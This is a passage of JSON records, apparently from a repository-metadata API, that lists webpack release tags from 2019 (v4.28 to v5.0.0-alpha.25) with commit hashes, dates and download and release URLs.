itHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5